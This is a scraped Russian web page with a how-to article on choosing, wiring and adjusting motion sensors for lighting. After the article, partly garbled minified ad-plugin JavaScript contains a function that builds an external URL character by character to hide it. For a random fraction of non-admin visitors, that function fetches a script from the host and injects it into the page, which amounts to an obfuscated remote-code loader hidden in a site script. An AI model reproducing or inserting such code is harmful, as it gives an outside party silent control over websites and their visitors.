Обзорный видеоматериал по теме использования микроволновых датчиков. Эти современные модификации отмечаются высоким уровнем “чутья” и надёжной работой в составе интеллектуальных домашних систем.

Завершая обзор, следует добавить информацию по техническим требованиям к таким приборам, как датчики движения.

Так, нагрузочная способность устройств не превышает обычно 1 кВт, а максимальная сила тока коммутации составляет не более 10А. Приборы рассчитаны на работу в сетях переменного тока с частотой 50-60 Гц при номинальном значении напряжения 230 В.

Об этих базовых параметра необходимо помнить, прежде чем подключать датчики для решения конкретных задач.

Поделитесь с читателями вашим опытом подключения и применения датчиков движения. Пожалуйста, оставляйте комментарии, задавайте вопросы по теме статьи и участвуйте в обсуждениях – форма для отзывов расположена ниже.

Подключение светильника через датчик движения

Для обеспечения безопасности и повышения комфорта людей к обычным светильникам не так давно были добавлены датчики движения. Они предназначены для реагирования в зоне их контроля — при движении передают сигнал через провод к прибору освещения, который включает свет. Если раньше такие приспособления использовали исключительно в охранных целях, то сегодня они обрели широкую популярность в частных домах и квартирах. Они выполняют следующие функции:

  • предотвращают поиск выключателя в темном помещении;
  • экономят электроэнергию, выключаясь при отсутствии фиксации передвижений;
  • могут активировать сигнализацию и отпугнуть злоумышленников.

Внешне такие светильники представлены пластмассовой прямоугольной или круглой коробкой, которую закрывает собой линза Френеля. Через неё прибор и следит за передвижениями в контрольной зоне. Линза Френеля сделана из довольно хрупкого и тонкого материала, который требует особой осторожности при монтаже осветительного прибора. Также при установке нужно учитывать, какого размера люди или животные будут проходить через контрольную зону датчика.

Датчик движения со встроенным светильником

При выборе светильника с контроллером нужно обратить внимание на его вид:

  • неподвижный — не двигается по мере перемещения человека;
  • подвижный — поворачивается в сторону, где было зафиксировано движение, и чаще используется в охранных целях.

В зависимости от типа сенсоры могут быть:

  • активными — работают по принципу эхолота;
  • пассивными — срабатывают через обнаружение тепла человеческого тела.

Как правило, дальность сенсора ограничивается 12 м. А при установке в помещении или на участке, имеющем непрямоугольную форму, нужно будет купить дополнительные осветительные приборы с сенсорами.

Схемы подключения датчика движения

Мнение эксперта

Выбирая датчик движения, стоит отдать предпочтение инфракрасным моделям. Они реагируют на тепло человеческого тела и устойчивы к звуковым колебаниям и вибрации (в отличие от ультразвуковых датчиков, реагирующих на перепады температуры). Они наиболее точны, однако им необходима тонкая настройка, желательно профессиональная.

Подсоединение контроллера движений к осветительному прибору

Подключить датчик передвижения по схеме — простая операция, которая напоминает подсоединение обыкновенного выключателя. Это логично, ведь этот прибор, подобно выключателю, размыкает и замыкает контакт через электроцепь, где находится осветительный прибор.

Обычно схема подключения контроллера движений по схеме приложена вместе с инструкцией или изображена на упаковке, корпусе устройства.

Согласно схеме, существует 2 вида провода питания датчика: фаза (проводник коричневого цвета) и ноль (провод голубого цвета). Когда из него выходит фаза, она передается на один из двух концов лампы в светильнике и наоборот. Когда контроллер срабатывает, контакт реле замыкается, что и приводит к передаче фазы.

Чтобы присоединить контроллер движений к светильнику по схеме, вам нужно:

  • снять заднюю крышку и найти колодку с клеммами. К ней подключены 3 провода, выходящие из корпуса прибора;
  • посмотрев на схему, указанную в инструкции или на корпусе, присоединить провод от датчика к соответствующему проводу в корпусе устройства;
  • после подключения контроллера надеть заднюю крышку;
  • для подключения проводки в распределительной коробке, где есть 7 проводов (3 от датчика движения, 2 от светильника, а также ноль и фаза), провод фазы кабеля питания подключается вместе с проводом фазы от контроллера передвижения. После провод «0» от кабеля питания соединяется с аналогичным проводом от светильника и датчика. Последний этап — соединение 2 оставшихся проводников.

Присоединение выключателя к датчику

Некоторые пользователи ламп, оснащенных датчиками движения, решаются подключить через общую цепь и выключатель. Это нужно, чтобы свет в некоторых случаях горел вне зависимости от работы датчика, например, при необходимости стоять неподвижно или включить свет в комнате или во дворе еще до входа туда.

Схема подключения датчика движения для освещения, для работы в двух режимах, а так же выключатель + датчик движения

Для подключения выключателя потребуется следовать несложной схеме, которую можно найти в интернете. Согласно ей, выключатель будет дублировать функции датчика, в отдельных случаях в принудительном режиме управляя светом. Такая схема предполагает параллельное подключение выключателя и контроллера передвижений.

При активном выключателе в схеме свет не будет гаснуть на протяжении нужного периода, а при выключенном — освещение будет контролироваться через контроллер.

Настройки датчика движения

Помимо подключения по схеме, нужно еще настроить датчик движения для освещения, отрегулировав такие параметры:

  • освещенность (LUX);
  • задержку выключения (TIME);
  • чувствительность к ИФ-лучам (SENS).

Отрегулировав временные настройки, можно установить отрезок, в течение которого освещение будет включаться с момента обнаружения движения в контролируемой области. Обычно это значение у светильников колеблется от 1 до 600 секунд. Важную роль в выставлении временного отрезка будет играть и скорость человека. От нее тоже зависит, сработает контроллер или нет. Если человек быстро проходит в контрольной области, показатель времени горения света лучше уменьшить. И наоборот — при установке такого приспособления в гараже или подсобном помещении логично было бы выставить большую задержку выключения.

Настройка датчиков движения

Что касается параметра освещенности LUX, то он корректирует работу светильника в дневное и ночное время суток. Если на улице или в комнате уровень освещенности понизился до определенной отметки, свет включается. Можно также изменить порог освещенности самостоятельно.

Установка параметра LUX на самое большое деление шкалы рекомендуется, если в помещении — малое количество дневного света и наоборот.

Во многих датчиках движения в светильниках можно регулировать и чувствительность к активации освещения — SENS. Реакция контроллера зависит от того, какой уровень чувствительности к объектам там выставлен. Если датчик движения довольно часто срабатывает, или же «видит» малейшие колебания, чувствительность требуется снизить. Помочь в её изменении может и простой поворот светильника в нужную точку. Кроме того, вы можете выставить:

  • дальность (не больше максимальной, которая обычно достигает 10—12 м);
  • объем (если вы не хотите, чтобы светильник включался из-за пролетевшей птицы).
  • Как подключить датчик движения к лампочке через выключатель

    В каждом помещении устанавливают осветительные приборы. Системы включения и расключения постоянно совершенствуются. Ассортимент электротехнических товаров пополнился устройством под названием «датчик движения». Небольшой механизм с помощью инфракрасного излучения реагирует на любые перемещения в пространстве по заданному радиусу поиска. Прибор используют для разных целей. Установка устройства вместе с выключателем позволит сэкономить денежные средства, добавит комфорта при обычной эксплуатации. Существует несколько основных методов соединения выключателя и датчика движения.

    Основные функции и принцип работы датчика движения

    Основная задача микроконтроллера, соединенного с переключателем и осветительным устройством – коммутировать электрическую сеть (замыкать/размыкать). Любое перемещение в зоне контроля запускает работу прибора. Кроме этого прибор можно настроить таким образом, чтобы сила освещения регулировалась интенсивностью движения – используются специальные контроллеры.

    Когда значение меньше установленного предела, индикатор замыкает цепь и лампа загорается. Детектор работает круглые сутки. Стандартный порог индикации – от 3 до 2 000 Лк.

    Некоторые приборы можно настроить на определенные часы работы. Например, в офисе нет необходимости включать свет ночью. Такие индикаторы дороже, но позволяют сэкономить электроэнергию.

    По принципу действия различают датчики:

    • инфракрасные – работают на основе теплового излучения;
    • ультразвуковые – действует как эхолокатор – звуковые волны, отражаясь от движущихся объектов, меняют длину, что служит сигналом для переключения;
    • микроволновые – похожи по типу действия на ультразвуковые, но более чувствительные, «засекают» объект, даже если он не в зоне прямой видимости;
    • лазерные – состоят из приемника и излучателя, сигнал пересылается между устройствами, если прерывается движущимся объектом – лампа включается;
    • комбинированные (исходя из названия – сочетают функции нескольких типов аппаратов).

    Схема подключения датчика движения достаточно простая. Установить прибор можно самостоятельно, не привлекая мастеров по электромонтажу. Чтобы исключить ошибки и неприятные ситуации, следует заранее ознакомиться с основными методами врезки механизма, типами устройств.

    Технические характеристики

    Помимо разновидности датчика движения важно учитывать его технические параметры: угол захвата, дальность действия, мощность светильников, способ установки, дополнительные возможности. Для моделей с беспроводным подключением учитывают диапазон подаваемого луча и вид батареи.

    Индикатор перемещений для коммутации электрической сети обладает определенным диапазоном обзора относительно горизонта. Если на территорию можно попасть с разных сторон, используют приборы радиусом от 180 до 360°. Для настенных достаточно 180°, на столбе — лучше 360°. Для небольших комнат подойдут индикаторы с меньшим углом. Стоимость широкоугольных устройств значительно выше, лучше руководствоваться степенью необходимости.

    Дальность действия подбирается, исходя из габаритов помещения. Цена принципиально отличается, поэтому важно точно знать длину комнаты или коридора при покупке. При этом важно оставить небольшой запас (около 0,5 метра), но перебарщивать не стоит – возможны частые некорректные сигналы.

    Датчики движения устанавливаются в уличных и домашних условиях. Кроме этого детекторы различают по способу монтажа:

    • корпусные изделия закрепляются на подставки, которые фиксируются на поверхности (стена, столб, потолок);
    • скрытые модели – практически незаметны.

    Дополнительные возможности

    Определенные модели индикаторов используются с большим комфортом благодаря наличию дополнительных функций. Механизмы стоят дороже, подбирают по необходимости.

    • Показатель внешнего естественного света – индикатор срабатывает от движения, но днем в дополнительном искусственном освещении потребности нет, поэтому ставят ограничитель – отдельный элемент фотореле или готовое изделие со встроенным устройством;
    • Распознавание животных – опция подойдет, если в доме или на улице есть животные небольшого размера: коты, собаки, куры, другие. Однако звери крупных пород все равно будут отмечаться и «подавать» сигнал к включению.
    • Таймер для отключения света в отсутствие движения после выхода из зоны контроля.

    Самыми полезными считаются ДД с распознаванием животных и таймером. По отзывам пользователей, устройства со встроенными опциями действительно удобны в эксплуатации.

    Установка датчика движения

    Для начала определяют способ подводки дополнительного кабеля к выключателю (наружный, внутренний). Перед непосредственным подключением снимают внешнюю крышку корпуса – в месте расположения защелки поддевают панель шлицевой отверткой. Завести провод в устройство можно двумя путями:

    • сзади – вариант подходит для электропроводки, уложенной внутрь стены;
    • сбоку – подходит для внешней электрической сети.

    Временную заглушку удаляют. Приступают к подсоединению проводов. Микроконтакты разделяют буквенными обозначениями. Обычно используют символы L, N и L1 – зависит от производителя и конфигурации индикатора.

    Следующий этап – закрепление датчика на потолке. Способ фиксации выбирается исходя из материала поверхности и детектора. В большинстве случаев на задней части корпуса есть специальные отверстия.

    Общие советы по монтажу:

    • Не рекомендуется соединять датчики движения с энергосберегающими лампочками. Срок эксплуатации последних при таком дополнении значительно сокращается.
    • Важно исключить из поля «зрения» детектора деревья, кустарники. Они могут излучать небольшое количество тепла, которого будет достаточно для активации работы индикатора;
    • Луч датчика следует поворачивать в ту сторону, где начинается движение: на входную дверь, ворота.

    Нужно настроить датчик до необходимого уровня чувствительности с помощью сервисных значений потенциометров. В классических устройствах три поворотных рычага:

    • период задержки (Time);
    • чувствительность (Meter);
    • яркость (Lux).

    Задержка на отключение показывает время, через которое лампа отключится, если отсутствует движение в комнате. Уровень яркости – сила света при включении в полной темноте – необходимо отрегулировать, чтобы не слепило глаза. Сначала выставляют на минимум, при эксплуатации – до нужного уровня комфорта, как и показатель чувствительности.

    Последний шаг установки – тестирование работы. Для этого используют режим Test индикатора Time.

    Все работы выполняются при полностью обесточенной электрической цепи. Только на этапе тестирования системы можно включить подачу электричества.

    Примерно минуту после подключения тока устройство будет проводить инициацию и активироваться. Проверка работоспособности механизма может проводиться без подключения осветительных приборов – ориентироваться можно по небольшому светодиоду на корпусе.

    Как подключить датчик движения к лампочке

    Подключить датчик движения можно несколькими способами. Каждый зависит от разновидности используемой лампы. Инструкция по установке детектора в отверстия для точечных светильников:

    1. полностью обесточить помещение;
    2. снять защитную панель детектора;
    3. подсоединить проводники согласно схеме на корпусе;
    4. фиксирующие пружины загнуть вверх;
    5. установить механизм в подготовленное отверстие.

    Завершающие этапы общие – регулировка чувствительности, времени, яркости и тестирование работоспособности.

    Детекторы, которые закрепляют к патрону, установить проще. Сначала вкручивается индикатор, затем лампочка. Нельзя брать более мощные, чем указано в техническом паспорте к датчику движения. В продаже можно найти специальные двойные лампы, разработанные специально для тандема с детекторами. Электромонтажеры рекомендуют приобретать именно такие.

    Подключение для управления без выключателя

    Схема без выключателя собирается из датчика движения и осветительного прибора. Является наиболее простой и быстрой. Описание дается в документации, приложенной к детектору, и на корпусе прибора.

    Для длинных помещений одного устройства может быть недостаточно – небольшой радиус действия. Необходимое количество механизмов соединяют параллельно через одноименные микроконтакты, затем подводят к лампе.

    Подключение к лампочке с выключателем

    Выключатель необходим, если потребуется отключить систему автоматической коммутации электрической цепи. Устройство врезают на участке между датчиком движения и блоком питания. Подключение осуществляется через фазные проводники входа и выхода – таким образом, создается обходное соединение.

    Выключатель удобно использовать в комнате, где нужно поддерживать освещение, но движение не происходит. Достаточно отключить подачу электричества к датчику и дампа будет гореть столько, сколько нужно.

    Выбор места подключения

    Для корректной работы устройства необходимо придерживаться определенных правил:

    • отсутствие осветительных приборов в непосредственной близи, кроме приборов, специально для этого предназначенных;
    • не допускается расположение рядом с техникой отопления: кондиционерами, печками, тепловыми пушками, подобными.

    При увеличении высоты размещения радиус действия также растет. Но при этом теряется чувствительность прибора.

    Датчик движения света своими руками

    Датчик движения, работающий на поиск тепловых излучений от перемещающихся объектов, является самым простым и часто используемым устройством подобного типа. Преимущества моделей – доступность деталей (по цене и наличию), отсутствие сложных регулировок, значительный разброс пределов температуры, простая сборка.

    Заводское изделие можно приобрести в точке продаж электротехнических товаров. Устройство доступно к сборке в домашних условиях – достаточно ознакомиться с общими принципами работы с электричеством, схемой и составляющими:

    • детектор на тепло;
    • фотореле;
    • резисторы (для установки предела реакции);
    • таймер, регуляторы.

    Детектор и фотореле – комплект по управлению осветительными приборами. Такое изделие срабатывает только после наступления темноты. Можно установить дополнительные функции по необходимости.

    Возможные проблемы и их решение

    Коридор – наиболее часто используемое место для монтажа датчиков движения в жилых помещениях – сюда выходят двери большинства комнат. Перед установкой составляют план квартиры с проводкой, чтобы учесть пространство действия и тип датчика. Если одного устройства не хватает, допустимо использование комбинации нескольких разновидностей приборов.

    Чтобы самостоятельно врезать в цепь включения света дополнительный механизм, достаточно общих знаний по электронике и требований безопасности – специальных навыков и оборудования не требуется. К приборам прилагается необходимая техническая информация и инструкция подключения. Главное – выполнить корректное соединение проводов и контактов прибора.

    Частая проблема – недостаточность диапазона работы одного механизма. Чтобы выполнить поставленную задачу, необходима установка нескольких приборов на один участок. Порядок монтажа приборов одинаков – кабели подключаются по направленности действия: фаза через детектор, ноль для второго провода.

    • Позиция прибора в пространстве помещения – необходимо соблюдать технические рекомендации производителя. Например, потолочные изделия нельзя закреплять на стене.
    • Наличие шторок – специальные линз-маски устанавливаются в прибор для корректной настройки, после тестирования их удаляют, если этого не сделать, «ловить» перемещения детектор не сможет.
    • Неправильное подключение в цепь с выключателем – детектор врезают перед переключателем света, при ином положении сеть разорвется и работа устройства станет невозможной.

    Необходимо учитывать рекомендации, закрепленные в технической документации к товару, а также помнить об общих правилах монтажа индикаторов движения.

    Подключение дополнительного детектора упростит некоторые моменты использования помещения, помогут сэкономить денежные средства. Реализовать каждый из плюсов можно, если соблюдать требования по выбору устройств и комплектации элементов цепей по техническим характеристикам, подбору места и монтажу. В противном случае приборы будут работать некорректно – ложные включение, перегорание лампочек и сети.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
Яндекс.Метрика